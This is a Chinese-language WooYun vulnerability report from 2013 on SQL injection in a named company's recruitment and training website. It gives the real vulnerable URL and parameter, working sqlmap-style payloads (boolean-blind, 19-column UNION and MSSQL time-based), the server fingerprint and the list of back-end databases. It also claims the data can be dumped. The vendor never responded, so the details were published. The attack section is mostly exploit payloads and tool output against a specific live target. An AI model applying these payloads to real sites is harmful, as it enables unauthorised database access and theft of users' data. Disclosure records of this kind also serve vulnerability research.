当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039410

漏洞标题:英创安众对日某招聘培训机构sql注入

相关厂商:英创安众

漏洞作者: caspar

提交时间:2013-10-12 18:15

修复时间:2013-11-26 18:15

公开时间:2013-11-26 18:15

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-11-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

对日某招聘培训机构sql注入,可脱裤

详细说明:

公司网站http://anchor.yingchuang.com/
注入地址 http://anchor.yingchuang.com/consult/seminar/detial.asp?id=227

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=227 AND 5320=5320
Type: UNION query
Title: Generic UNION query (NULL) - 19 columns
Payload: id=-7089 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(110)+CHAR(116)+CHAR(100)+CHAR(113)+CHAR(87)+CHAR(76)+CHAR(101)+CHAR(105)+CHAR(104)+CHAR(74)+CHAR(117)+CHAR(109)+CHAR(113)+CHAR(66)+CHAR(113)+CHAR(100)+CHAR(98)+CHAR(99)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: id=-6742 OR 8302=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
web server operating system: Windows Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
available databases [6]:
[*] iBusiness
[*] master
[*] model
[*] msdb
[*] SNS_DB
[*] tempdb


随便查点数据,这个列名实在吐血

1 - 副本 - 副本.jpg

漏洞证明:

见详细说明

修复方案:

1.权限设置
2.这个列名谁看的懂?

版权声明:转载请注明来源 caspar@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论